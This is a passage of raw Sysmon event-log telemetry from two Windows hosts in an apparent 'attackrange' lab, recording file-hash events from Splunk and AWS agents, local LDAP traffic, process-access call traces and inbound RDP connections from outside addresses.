09:02:14.570{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51202-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048145Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:16.297{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05A320490C477D79B017F0399D4BF49C,SHA256=F55D6CA7BD881EDBDA5E0F2530639ACB17C7345185328C1FEBB5BE5C5FFB49D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048155Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:17.962{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4299MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048154Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:17.798{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4612A3DEE565E57DA4E687633D36009,SHA256=54CBC7C237AE380420C6E15C93721B630E5724DEB77BC5AC2AE98D6E14761870,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976710Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:17.513{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7B71ECAF651049F1CA18C0B7828B704,SHA256=3FB680BBE2D57AF7DBD743A4476415D3A40472E5FE6F186080B82D7B9EFD58CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048153Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:15.952{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49232-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001048152Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:15.952{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local49232-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001048156Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:18.844{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C227C27EC706740448572FF97CE0072E,SHA256=79F93F07EC12C0B0BDAC6498CFE9E0BBB2340EBC3B54846AF826700F03264926,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976712Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:18.560{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3F3F6C61337D4E6CD6A707997B3225DA,SHA256=F93580F1B9E2FE925DBD95ABB3F4C210BFAA32E3C0EAD026170FB8FF5512B198,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976711Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:18.529{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0067428E405D09FB804966C57FBB5180,SHA256=315143A6ABBB2FA9FED2085552DAC8EA9A02D275039D467CEFB14BE9B64C08C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976716Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:16.702{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53151-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976715Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:15.892{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59269-false10.0.1.12-8000- 354300x8000000000000000976714Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:15.794{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-51666-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976713Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:19.544{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9C6344154BA76FDCC1EDD71999754CC,SHA256=57DD985732D2CE56B71B56C8CB9541D0CFA3912B34DC63F33521F37D6BB6BEF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048158Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:19.859{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82A9567375CAEFC5C9E175B628E12E4D,SHA256=BA73713C30EE6E9832CF16142F16219F5BE57F6C50BF140595E3569A96B3DFE9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048157Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:16.753{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49233-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000976719Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:17.656{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-12356-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976718Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:20.763{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCAF0A4F5BC508EDE67B999311B64F8E,SHA256=A74BA06A54E4C67F140759466A0C588CD1F6C0A76A09ADC0EF1CD506F9726B0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048161Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:20.861{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75BAF384B683D925EBCAB9B405303E84,SHA256=BC18DFB5114F25167B4FCCE295B2718A257D9D2B003E450F6BF94CAFD23654A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976717Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:20.622{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=500C5A2F55E02063B13D7CFE5C5BE96E,SHA256=E45279ECB52F7738294403E8165677BA9F84195FAD744895EAFA949F623D758F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048160Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:20.579{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9C6B50A4505F0188B962F6ED3D19E8F,SHA256=C165D84F41F50002FD082219D9DEDB42B704A9C3B94C87EC054392590D1E273D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048159Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:20.396{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048163Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:21.864{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87714BC3DF8D79029F07DE475A63BA2E,SHA256=4CF324147F30711530D3A602BD9F82DEF3342FD4FCF39A9D5ECC867BD24BA2AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048162Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:19.784{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49590-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048164Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:22.881{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BB2FCF6D004ED09FFFCC1034D5C055F,SHA256=4D0837F4E74FA553C1561834CA93FB2BDEAC1AFFD60FAFC13EB6FCADB9A46821,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976722Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:19.620{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50559-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976721Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:22.310{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=88CF75961BF5601431614BE0F5303577,SHA256=20BAEA70D555F12E220D7B6F94E865FF50DF1EA7A4E2B042E16DF817E4CFB16B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976720Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:21.998{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0C5AE7B1B9577C901B93DBF0CA56C1C,SHA256=24B94A1864DB66BEC4B23BB0D00D47AE72739FD157FADD6053114FAF060C3904,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048165Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:23.916{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E69E4AD2347F516542D1543145AE3A5D,SHA256=D62A6BD87EB0935D61A462554FAF54B389066274909B5ABDC18DDAFAC92ACD6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976723Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:23.234{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F981B107FB12DFE9D3B9418B101B2047,SHA256=BB5E29DB88732F2116F66131906C9878DBD994B27E879B1581CEECD6FF46F3CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048167Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:24.921{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=465BD5B151E387E18A0695F7C342C166,SHA256=2431E54BDFDBE01C1A342788C1228BBAD7692678CE39D50BACAAEFE0EFA2362C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976725Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:24.312{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=042232011793B1E9543D34020B12AC1D,SHA256=08D013FA1A79CE81BE29314CC7CB992F32D93E2E4E74D0BB5757035B8FC6D673,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048166Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:21.792{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49234-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000976724Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:20.639{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-23846-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000976743Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.921{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-88A1-6151-8179-00000000FD01}3888C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976742Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976741Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976740Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976739Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976738Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976737Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976736Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976735Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976734Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976733Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:25.921{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-88A1-6151-8179-00000000FD01}3888C:\Program 